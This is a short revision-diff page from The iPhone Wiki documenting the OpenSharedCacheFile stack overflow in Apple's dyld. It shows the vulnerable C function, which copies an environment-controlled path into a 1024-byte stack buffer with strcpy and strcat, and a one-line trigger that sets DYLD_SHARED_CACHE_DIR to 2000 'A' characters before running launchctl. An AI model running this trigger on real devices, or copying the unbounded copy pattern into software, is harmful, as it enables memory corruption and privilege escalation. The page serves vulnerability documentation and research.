The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information. |
Difference between revisions of "OpenSharedCacheFile"
m (Grammar dude! Stub too.) |
Awesomebing1 (talk | contribs) m (No s) |
||
Line 4: | Line 4: | ||
{ |
{ |
||
char path[1024]; |
char path[1024]; |
||
− | strcpy(path, |
+ | strcpy(path, SharedCacheDir); |
strcat(path, "/"); |
strcat(path, "/"); |
||
strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME); |
strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME); |
Revision as of 22:09, 23 March 2015
The OpenSharedCacheFile bug was found by i0n1c. This bug is a simple stack overflow.
int openSharedCacheFile() { char path[1024]; strcpy(path, SharedCacheDir); strcat(path, "/"); strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME); return ::open(path, O_RDONLY); }
Triggering the vuln
To trigger it, run the following
DYLD_SHARED_CACHE_DIR = “A” * 2000 \ DYLD_SHARED_REGION = private /bin/launchctl
This will overflow the PC register making it a stack overflow.
This article is a "stub", an incomplete page. Please add more content to this article and remove this tag. |